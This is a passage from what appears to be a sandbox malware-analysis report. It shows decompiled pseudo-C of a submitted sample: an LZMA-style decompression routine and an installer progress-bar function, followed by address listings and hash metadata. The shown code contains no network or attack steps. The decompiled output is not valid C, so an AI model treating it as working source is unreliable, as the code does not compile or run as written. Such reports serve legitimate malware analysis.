										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                  0x00000000
                  0x00406355
                  0x00406355
                  0x00406359
                  0x00406382
                  0x0040638c
                  0x0040635b
                  0x00406364
                  0x00406371
                  0x00406374
                  0x004066b8
                  0x004066b8
                  0x004066bb
                  0x004066bb
                  0x004066bb
                  0x004066c1
                  0x004066c7
                  0x004066cd
                  0x004066e7
                  0x004066ea
                  0x004066f0
                  0x004066fb
                  0x004066fd
                  0x004066cf
                  0x004066cf
                  0x004066de
                  0x004066e2
                  0x004066e2
                  0x00406707
                  0x00000000
                  0x00000000
                  0x00406709
                  0x0040670d
                  0x004068bc
                  0x004068d2
                  0x004068da
                  0x004068e1
                  0x004068e3
                  0x004068ea
                  0x004068ee
                  0x004068ee
                  0x00406719
                  0x00406720
                  0x00406728
                  0x0040672b
                  0x0040672e
                  0x0040672e
                  0x00406734
                  0x00406734
                  0x00405ed0
                  0x00405ed0
                  0x00405ed0
                  0x00405ed9
                  0x00000000
                  0x00000000
                  0x00405edf
                  0x00000000
                  0x00405eea
                  0x00000000
                  0x00000000
                  0x00405ef3
                  0x00405ef6
                  0x00405ef9
                  0x00405efd
                  0x00000000
                  0x00000000
                  0x00405f03
                  0x00405f06
                  0x00405f08
                  0x00405f09
                  0x00405f0c
                  0x00405f0e
                  0x00405f0f
                  0x00405f11
                  0x00405f14
                  0x00405f19
                  0x00405f1e
                  0x00405f27
                  0x00405f3a
                  0x00405f3d
                  0x00405f49
                  0x00405f71
                  0x00405f73
                  0x00405f81
                  0x00405f81
                  0x00405f85
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405f75
                  0x00405f75
                  0x00405f78
                  0x00405f79
                  0x00405f79
                  0x00000000
                  0x00405f75
                  0x00405f4f
                  0x00405f54
                  0x00405f54
                  0x00405f5d
                  0x00405f65
                  0x00405f68
                  0x00000000
                  0x00405f6e
                  0x00405f6e
                  0x00000000
                  0x00405f6e
                  0x00000000
                  0x00405f8b
                  0x00405f8b
                  0x00405f8f
                  0x0040683b
                  0x00000000
                  0x0040683b
                  0x00405f98
                  0x00405fa8
                  0x00405fab
                  0x00405fae
                  0x00405fae
                  0x00405fae
                  0x00405fb1
                  0x00405fb5
                  0x00000000
                  0x00000000
                  0x00405fb7
                  0x00405fbd
                  0x00405fe7
                  0x00405fed
                  0x00405ff4
                  0x00000000
                  0x00405ff4
                  0x00405fc3
                  0x00405fc6
                  0x00405fcb
                  0x00405fcb
                  0x00405fd6
                  0x00405fde
                  0x00405fe1
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406026
                  0x0040602c
                  0x0040602f
                  0x0040603c
                  0x00406044
                  0x004066b8
                  0x00000000
                  0x00000000
                  0x00405ffb
                  0x00405ffb
                  0x00405fff
                  0x0040684a
                  0x00000000
                  0x0040684a
                  0x0040600b
                  0x00406016
                  0x00406016
                  0x00406016
                  0x00406019
                  0x0040601c
                  0x0040601f
                  0x00406024
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004066bb
                  0x004066bb
                  0x004066c1
                  0x004066c7
                  0x004066cd
                  0x004066e7
                  0x004066ea
                  0x004066f0
                  0x004066fb
                  0x004066fd
                  0x004066cf
                  0x004066cf
                  0x004066de
                  0x004066e2
                  0x004066e2
                  0x00406707
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040604c
                  0x0040604e
                  0x00406051
                  0x004060c2
                  0x004060c5
                  0x004060c8
                  0x004060cf
                  0x004060d9
                  0x004066b8
                  0x004066b8
                  0x00000000
                  0x004066b8
                  0x004066b8
                  0x00406053
                  0x00406057
                  0x0040605a
                  0x0040605c
                  0x0040605f
                  0x00406062
                  0x00406064
                  0x00406067
                  0x00406069
                  0x0040606e
                  0x00406071
                  0x00406074
                  0x00406078
                  0x0040607f
                  0x00406082
                  0x00406089
                  0x0040608d
                  0x00406095
                  0x00406095
                  0x00406095
                  0x0040608f
                  0x0040608f
                  0x0040608f
                  0x00406084
                  0x00406084
                  0x00406084
                  0x00406099
                  0x0040609c
                  0x004060ba
                  0x004060bc
                  0x00000000
                  0x0040609e
                  0x0040609e
                  0x004060a1
                  0x004060a4
                  0x004060a7
                  0x004060a9
                  0x004060a9
                  0x004060a9
                  0x004060ac
                  0x004060af
                  0x004060b1
                  0x004060b2
                  0x004060b5
                  0x00000000
                  0x004060b5
                  0x00000000
                  0x004062eb
                  0x004062ef
                  0x0040630d
                  0x00406310
                  0x00406317
                  0x0040631a
                  0x0040631d
                  0x00406320
                  0x00406323
                  0x00406326
                  0x00406328
                  0x0040632f
                  0x00406330
                  0x00406332
                  0x00406335
                  0x00406338
                  0x0040633b
                  0x0040633b
                  0x00406340
                  0x00000000
                  0x00406340
                  0x004062f1
                  0x004062f4
                  0x004062f7
                  0x00406301
                  0x004066b8
                  0x004066b8
                  0x00000000
                  0x004066b8
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406398
                  0x0040639c
                  0x00000000
                  0x00000000
                  0x004063a2
                  0x004063a6
                  0x00000000
                  0x00000000
                  0x004063ac
                  0x004063ae
                  0x004063b2
                  0x004063b2
                  0x004063b5
                  0x004063b9
                  0x00000000
                  0x00000000
                  0x00406409
                  0x0040640d
                  0x00406414
                  0x00406417
                  0x0040641a
                  0x00406424
                  0x004066b8
                  0x004066b8
                  0x00000000
                  0x004066b8
                  0x004066b8
                  0x0040640f
                  0x00000000
                  0x00000000
                  0x00406430
                  0x00406434
                  0x0040643b
                  0x0040643e
                  0x00406441
                  0x00406436
                  0x00406436
                  0x00406436
                  0x00406444
                  0x00406447
                  0x0040644a
                  0x0040644a
                  0x0040644d
                  0x00406450
                  0x00406453
                  0x00406453
                  0x00406456
                  0x0040645d
                  0x00406462
                  0x00000000
                  0x00000000
                  0x004064f0
                  0x004064f0
                  0x004064f4
                  0x00406892
                  0x00000000
                  0x00406892
                  0x004064fa
                  0x004064fd
                  0x00406500
                  0x00406504
                  0x00406507
                  0x0040650d
                  0x0040650f
                  0x0040650f
                  0x0040650f
                  0x00406512
                  0x00406515
                  0x00000000
                  0x00000000
                  0x004060e5
                  0x004060e5
                  0x004060e9
                  0x00406856
                  0x00000000
                  0x00406856
                  0x004060ef
                  0x004060f2
                  0x004060f5
                  0x004060f9
                  0x004060fc
                  0x00406102
                  0x00406104
                  0x00406104
                  0x00406104
                  0x00406107
                  0x0040610a
                  0x0040610a
                  0x0040610d
                  0x00406110
                  0x00000000
                  0x00000000
                  0x00406116
                  0x0040611c
                  0x00000000
                  0x00000000
                  0x00406122
                  0x00406122
                  0x00406126
                  0x00406129
                  0x0040612c
                  0x0040612f
                  0x00406132
                  0x00406133
                  0x00406136
                  0x00406138
                  0x0040613e
                  0x00406141
                  0x00406144
                  0x00406147
                  0x0040614a
                  0x0040614d
                  0x00406150
                  0x0040616c
                  0x0040616f
                  0x00406172
                  0x00406175
                  0x0040617c
                  0x00406180
                  0x00406182
                  0x00406186
                  0x00406152
                  0x00406152
                  0x00406156
                  0x0040615e
                  0x00406163
                  0x00406165
                  0x00406167
                  0x00406167
                  0x00406189
                  0x00406190
                  0x00406193
                  0x00000000
                  0x00406199
                  0x00000000
                  0x00406199
                  0x00000000
                  0x0040619e
                  0x0040619e
                  0x004061a2
                  0x00406862
                  0x00000000
                  0x00406862
                  0x004061a8
                  0x004061ab
                  0x004061ae
                  0x004061b2
                  0x004061b5
                  0x004061bb
                  0x004061bd
                  0x004061bd
                  0x004061bd
                  0x004061c0
                  0x004061c3
                  0x004061c3
                  0x004061c3
                  0x004061c9
                  0x00000000
                  0x00000000
                  0x004061cb
                  0x004061ce
                  0x004061d1
                  0x004061d4
                  0x004061d7
                  0x004061da
                  0x004061dd
                  0x004061e0
                  0x004061e3
                  0x004061e6
                  0x004061e9
                  0x00406201
                  0x00406204
                  0x00406207
                  0x0040620a
                  0x0040620a
                  0x0040620d
                  0x00406211
                  0x00406213
                  0x004061eb
                  0x004061eb
                  0x004061f3
                  0x004061f8
                  0x004061fa
                  0x004061fc
                  0x004061fc
                  0x00406216
                  0x0040621d
                  0x00406220
                  0x00000000
                  0x00406222
                  0x00000000
                  0x00406222
                  0x00406220
                  0x00406227
                  0x00406227
                  0x00406227
                  0x00406227
                  0x00000000
                  0x00000000
                  0x00406262
                  0x00406262
                  0x00406266
                  0x0040686e
                  0x00000000
                  0x0040686e
                  0x0040626c
                  0x0040626f
                  0x00406272
                  0x00406276
                  0x00406279
                  0x0040627f
                  0x00406281
                  0x00406281
                  0x00406281
                  0x00406284
                  0x00406287
                  0x00406287
                  0x0040628d
                  0x0040622b
                  0x0040622b
                  0x0040622e
                  0x00000000
                  0x0040622e
                  0x0040628f
                  0x0040628f
                  0x00406292
                  0x00406295
                  0x00406298
                  0x0040629b
                  0x0040629e
                  0x004062a1
                  0x004062a4
                  0x004062a7
                  0x004062aa
                  0x004062ad
                  0x004062c5
                  0x004062c8
                  0x004062cb
                  0x004062ce
                  0x004062ce
                  0x004062d1
                  0x004062d5
                  0x004062d7
                  0x004062af
                  0x004062af
                  0x004062b7
                  0x004062bc
                  0x004062be
                  0x004062c0
                  0x004062c0
                  0x004062da
                  0x004062e1
                  0x004062e4
                  0x00000000
                  0x004062e6
                  0x00000000
                  0x004062e6
                  0x00000000
                  0x00406573
                  0x00406573
                  0x00406577
                  0x0040689e
                  0x00000000
                  0x0040689e
                  0x0040657d
                  0x00406580
                  0x00406583
                  0x00406587
                  0x0040658a
                  0x00406590
                  0x00406592
                  0x00406592
                  0x00406592
                  0x00406595
                  0x00000000
                  0x00000000
                  0x00406343
                  0x00406343
                  0x00406346
                  0x004066b8
                  0x004066b8
                  0x00000000
                  0x004066b8
                  0x00000000
                  0x00406682
                  0x00406686
                  0x004066a8
                  0x004066ab
                  0x004066b5
                  0x004066b8
                  0x004066b8
                  0x00000000
                  0x004066b8
                  0x004066b8
                  0x00406688
                  0x0040668b
                  0x0040668f
                  0x00406692
                  0x00406692
                  0x00406695
                  0x00000000
                  0x00000000
                  0x0040673f
                  0x00406743
                  0x00406761
                  0x00406761
                  0x00406761
                  0x00406768
                  0x0040676f
                  0x00406776
                  0x00406776
                  0x00000000
                  0x00406776
                  0x00406745
                  0x00406748
                  0x0040674b
                  0x0040674e
                  0x00406755
                  0x00406699
                  0x00406699
                  0x0040669c
                  0x00000000
                  0x00000000
                  0x00406830
                  0x00406833
                  0x00406734
                  0x00000000
                  0x00000000
                  0x0040646a
                  0x0040646c
                  0x00406473
                  0x00406474
                  0x00406476
                  0x00406479
                  0x00000000
                  0x00000000
                  0x00406481
                  0x00406484
                  0x00406487
                  0x00406489
                  0x0040648b
                  0x0040648b
                  0x0040648c
                  0x0040648f
                  0x00406496
                  0x00406499
                  0x004064a7
                  0x00000000
                  0x00000000
                  0x0040677d
                  0x0040677d
                  0x00406780
                  0x00406787
                  0x00000000
                  0x00000000
                  0x0040678c
                  0x0040678c
                  0x00406790
                  0x004068c8
                  0x00000000
                  0x004068c8
                  0x00406796
                  0x00406799
                  0x0040679c
                  0x004067a0
                  0x004067a3
                  0x004067a9
                  0x004067ab
                  0x004067ab
                  0x004067ab
                  0x004067ae
                  0x004067b1
                  0x004067b1
                  0x004067b1
                  0x004067b1
                  0x004067b4
                  0x004067b4
                  0x004067b8
                  0x00406818
                  0x0040681b
                  0x00406820
                  0x00406821
                  0x00406823
                  0x00406825
                  0x00406828
                  0x00406734
                  0x00406734
                  0x00000000
                  0x0040673a
                  0x00406734
                  0x004067ba
                  0x004067c0
                  0x004067c3
                  0x004067c6
                  0x004067c9
                  0x004067cc
                  0x004067cf
                  0x004067d2
                  0x004067d5
                  0x004067d8
                  0x004067db
                  0x004067f4
                  0x004067f7
                  0x004067fa
                  0x004067fd
                  0x00406801
                  0x00406803
                  0x00406803
                  0x00406804
                  0x00406807
                  0x004067dd
                  0x004067dd
                  0x004067e5
                  0x004067ea
                  0x004067ec
                  0x004067ef
                  0x004067ef
                  0x0040680a
                  0x00406811
                  0x00000000
                  0x00406813
                  0x00000000
                  0x00406813
                  0x00000000
                  0x004064af
                  0x004064b2
                  0x004064e8
                  0x00406618
                  0x00406618
                  0x00406618
                  0x00406618
                  0x0040661b
                  0x0040661b
                  0x0040661e
                  0x00406620
                  0x004068aa
                  0x00000000
                  0x004068aa
                  0x00406626
                  0x00406629
                  0x00000000
                  0x00000000
                  0x0040662f
                  0x00406633
                  0x00406636
                  0x00406636
                  0x00406636
                  0x00000000
                  0x00406636
                  0x004064b4
                  0x004064b6
                  0x004064b8
                  0x004064ba
                  0x004064bd
                  0x004064be
                  0x004064c0
                  0x004064c2
                  0x004064c5
                  0x004064c8
                  0x004064de
                  0x004064e3
                  0x0040651b
                  0x0040651b
                  0x0040651f
                  0x0040654b
                  0x0040654d
                  0x00406554
                  0x00406557
                  0x0040655a
                  0x0040655a
                  0x0040655f
                  0x0040655f
                  0x00406561
                  0x00406564
                  0x0040656b
                  0x0040656e
                  0x0040659b
                  0x0040659b
                  0x0040659e
                  0x004065a1
                  0x00406615
                  0x00406615
                  0x00406615
                  0x00000000
                  0x00406615
                  0x004065a3
                  0x004065a9
                  0x004065ac
                  0x004065af
                  0x004065b2
                  0x004065b5
                  0x004065b8
                  0x004065bb
                  0x004065be
                  0x004065c1
                  0x004065c4
                  0x004065dd
                  0x004065df
                  0x004065e2
                  0x004065e3
                  0x004065e6
                  0x004065e8
                  0x004065eb
                  0x004065ed
                  0x004065ef
                  0x004065f2
                  0x004065f4
                  0x004065f7
                  0x004065fb
                  0x004065fd
                  0x004065fd
                  0x004065fe
                  0x00406601
                  0x00406604
                  0x004065c6
                  0x004065c6
                  0x004065ce
                  0x004065d3
                  0x004065d5
                  0x004065d8
                  0x004065d8
                  0x00406607
                  0x0040660e
                  0x00406598
                  0x00406598
                  0x00406598
                  0x00406598
                  0x00000000
                  0x00406610
                  0x00000000
                  0x00406610
                  0x0040660e
                  0x00406521
                  0x00406524
                  0x00406526
                  0x00406529
                  0x0040652c
                  0x0040652f
                  0x00406531
                  0x00406534
                  0x00406537
                  0x00406537
                  0x0040653a
                  0x0040653a
                  0x0040653d
                  0x00406544
                  0x00406518
                  0x00406518
                  0x00406518
                  0x00406518
                  0x00000000
                  0x00406546
                  0x00000000
                  0x00406546
                  0x00406544
                  0x004064ca
                  0x004064cd
                  0x004064cf
                  0x004064d2
                  0x00000000
                  0x00000000
                  0x00406231
                  0x00406231
                  0x00406235
                  0x0040687a
                  0x00000000
                  0x0040687a
                  0x0040623b
                  0x0040623e
                  0x00406241
                  0x00406244
                  0x00406247
                  0x0040624a
                  0x0040624d
                  0x0040624f
                  0x00406252
                  0x00406255
                  0x00406258
                  0x0040625a
                  0x0040625a
                  0x0040625a
                  0x00000000
                  0x00000000
                  0x004063bc
                  0x004063bc
                  0x004063c0
                  0x00406886
                  0x00000000
                  0x00406886
                  0x004063c6
                  0x004063c9
                  0x004063cc
                  0x004063cf
                  0x004063d1
                  0x004063d1
                  0x004063d1
                  0x004063d4
                  0x004063d7
                  0x004063da
                  0x004063dd
                  0x004063e0
                  0x004063e3
                  0x004063e4
                  0x004063e6
                  0x004063e6
                  0x004063e6
                  0x004063e9
                  0x004063ec
                  0x004063ef
                  0x004063f2
                  0x004063f2
                  0x004063f2
                  0x004063f5
                  0x004063f7
                  0x004063f7
                  0x00000000
                  0x00000000
                  0x00406639
                  0x00406639
                  0x00406639
                  0x0040663d
                  0x00000000
                  0x00000000
                  0x00406643
                  0x00406646
                  0x00406649
                  0x0040664c
                  0x0040664e
                  0x0040664e
                  0x0040664e
                  0x00406651
                  0x00406654
                  0x00406657
                  0x0040665a
                  0x0040665d
                  0x00406660
                  0x00406661
                  0x00406663
                  0x00406663
                  0x00406663
                  0x00406666
                  0x00406669
                  0x0040666c
                  0x0040666f
                  0x00406672
                  0x00406676
                  0x00406678
                  0x0040667b
                  0x00000000
                  0x0040667d
                  0x004063fa
                  0x004063fa
                  0x00000000
                  0x004063fa
                  0x0040667b
                  0x004068b0
                  0x00000000
                  0x00000000
                  0x00405edf
                  0x004068e7
                  0x004068e7
                  0x00000000
                  0x004068e7
                  0x00406734
                  0x004066bb
                  0x004066b8

                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
                  • Instruction ID: 03af6c1e27b970ccc0602dedbaa06cf660f45ac3eaa39f8bc43b8226cdf4d636
                  • Opcode Fuzzy Hash: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
                  • Instruction Fuzzy Hash: 46715571D00229DFEF28CF98C844BADBBB1FB44305F15806AD816BB281C7789A96DF44
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 69%
                  			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x423ed0;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42368c =  *0x42368c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42368c, 0x7530,  *0x423674), 0);
					}
				}
				return 0;
			}











                  0x0040138a
                  0x004013fa
                  0x0040139b
                  0x004013a0
                  0x00000000
                  0x00000000
                  0x004013a2
                  0x004013a3
                  0x004013ad
                  0x00000000
                  0x00401404
                  0x004013b0
                  0x004013b7
                  0x004013bd
                  0x004013be
                  0x004013c0
                  0x004013c2
                  0x004013b9
                  0x004013b9
                  0x004013ba
                  0x004013ba
                  0x004013c9
                  0x004013cb
                  0x004013f4
                  0x004013f4
                  0x004013c9
